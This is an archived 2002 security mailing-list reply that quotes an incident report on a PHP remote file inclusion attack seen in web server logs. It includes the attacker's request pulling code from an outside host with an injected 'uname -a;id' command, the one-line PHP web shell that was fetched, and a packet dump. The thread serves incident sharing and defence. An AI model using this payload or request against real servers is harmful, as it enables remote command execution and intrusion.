I noticed the same attack 9/16. It orginated from 200.165.31.202. Regards, Harald ----- Original Message ----- From: "zeno" <bugtraqat_private> To: <webppsecat_private> Cc: <incidentsat_private> Sent: Tuesday, September 17, 2002 8:12 PM Subject: Good practicle php attack example > I figured a few people may find this interesting. > > 200.152.80.22 - - [14/Sep/2002:16:47:23 -0400] "GET /index.php?file=http://www.jtecx.hpg.com.br/jtec.txt&cmd=uname%20-a;id HTTP/1.0" 404 2656 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Q312461)" > > contents of www.jtecx.hpg.com.br/jtec.txt > > ------------------- start snip > > <?php > system($cmd); > ?> > > ------------------- end snip > > He is attempting to include code from site B into site A and have it execute the code locally. > You can see he is issuing it commands via a query "&cmd=uname%20-a;id". > > > Anyone else have any good examples of these types of attacks? Real life experiences, etc... > > > - zenoat_private > > > FULL PACKET DUMP BELOW > > > > 0x0000: 00 A0 24 91 0E C2 00 01 97 DB C8 00 08 00 45 00 ..$...........E. > 0x0010: 02 36 C6 13 40 00 25 06 58 54 C8 98 50 16 C7 7D .6..@.%.XT..P..} > 0x0020: 55 2E 08 57 00 50 BA AF F1 7E C9 CF A9 D0 50 18 U..W.P...~....P. > 0x0030: E4 20 9A 2D 00 00 47 45 54 20 2F 69 6E 64 65 78 . .-..GET /index > 0x0040: 2E 70 68 70 3F 66 69 6C 65 3D 68 74 74 70 3A 2F .php?file=http:/ > 0x0050: 2F 77 77 77 2E 6A 74 65 63 78 2E 68 70 67 2E 63 /www.jtecx.hpg.c > 0x0060: 6F 6D 2E 62 72 2F 6A 74 65 63 2E 74 78 74 26 63 om.br/jtec.txt&c > 0x0070: 6D 64 3D 75 6E 61 6D 65 20 2D 61 3B 69 64 20 64 md=uname -a;id d > 0x0080: 20 48 54 54 50 2F 31 2E 30 0D 0A 41 63 63 65 70 HTTP/1.0..Accep > 0x0090: 74 3A 20 69 6D 61 67 65 2F 67 69 66 2C 20 69 6D t: image/gif, im > 0x00A0: 61 67 65 2F 78 2D 78 62 69 74 6D 61 70 2C 20 69 age/x-xbitmap, i > 0x00B0: 6D 61 67 65 2F 6A 70 65 67 2C 20 69 6D 61 67 65 mage/jpeg, image > 0x00C0: 2F 70 6A 70 65 67 2C 20 61 70 70 6C 69 63 61 74 /pjpeg, applicat > 0x00D0: 69 6F 6E 2F 76 6E 64 2E 6D 73 2D 65 78 63 65 6C ion/vnd.ms-excel > 0x00E0: 2C 20 61 70 70 6C 69 63 61 74 69 6F 6E 2F 76 6E , application/vn > 0x00F0: 64 2E 6D 73 2D 70 6F 77 65 72 70 6F 69 6E 74 2C d.ms-powerpoint, > 0x0100: 20 61 70 70 6C 69 63 61 74 69 6F 6E 2F 6D 73 77 application/msw > 0x0110: 6F 72 64 2C 20 2A 2F 2A 0D 0A 41 63 63 65 70 74 ord, */*..Accept > 0x0120: 2D 4C 61 6E 67 75 61 67 65 3A 20 70 74 20 2D 62 -Language: pt -b > 0x0130: 72 0D 0A 41 63 63 65 70 74 2D 20 45 6E 63 6F 64 r..Accept- Encod > 0x0140: 69 6E 67 3A 20 67 7A 69 70 20 2C 20 64 65 66 6C ing: gzip , defl > 0x0150: 61 74 65 0D 0A 55 73 65 72 2D 41 67 65 6E 74 3A ate..User-Agent: > 0x0160: 20 4D 6F 7A 69 6C 6C 61 2F 34 2E 30 20 28 63 6F Mozilla/4.0 (co > 0x0170: 6D 70 61 74 69 62 6C 65 3B 20 4D 53 49 45 20 36 mpatible; MSIE 6 > 0x0180: 2E 30 3B 20 57 69 6E 64 6F 77 73 20 39 38 3B 20 .0; Windows 98; > 0x0190: 51 33 31 32 34 36 31 29 0D 0A 56 69 61 3A 20 31 Q312461)..Via: 1 > 0x01A0: 2E 31 20 66 77 2D 61 73 73 2E 70 72 75 64 65 2E .1 fw-ass.prude. > 0x01B0: 6E 65 74 3A 38 30 38 30 20 28 53 71 75 69 64 2F net:8080 (Squid/ > 0x01C0: 32 2E 34 2E 53 54 41 42 4C 45 36 29 0D 0A 58 2D 2.4.STABLE6)..X- > 0x01D0: 46 6F 72 77 61 72 64 65 64 2D 46 6F 72 3A 20 32 Forwarded-For: 2 > 0x01E0: 30 30 2E 31 35 32 2E 38 33 2E 31 39 39 0D 0A 48 00.152.83.199..H > 0x01F0: 6F 73 74 3A 20 77 77 77 2E 63 67 69 73 65 63 75 ost: www.cgisecu > 0x0200: 72 69 74 79 2E 63 6F 6D 0D 0A 43 61 63 68 65 2D rity.com..Cache- > 0x0210: 43 6F 6E 74 72 6F 6C 3A 20 6D 61 78 2D 61 67 65 Control: max-age > 0x0220: 3D 33 30 30 30 30 30 30 0D 0A 43 6F 6E 6E 65 63 =3000000..Connec > 0x0230: 74 69 6F 6E 3A 20 6B 65 65 70 2D 61 6C 69 76 65 tion: keep-alive > 0x0240: 0D 0A 0D 0A .... > > > > > -------------------------------------------------------------------------- -- > This list is provided by the SecurityFocus ARIS analyzer service. > For more information on this free incident handling, management > and tracking system please see: http://aris.securityfocus.com > > ---------------------------------------------------------------------------- This list is provided by the SecurityFocus ARIS analyzer service. For more information on this free incident handling, management and tracking system please see: http://aris.securityfocus.com
This archive was generated by hypermail 2b30 : Wed Sep 18 2002 - 16:47:59 PDT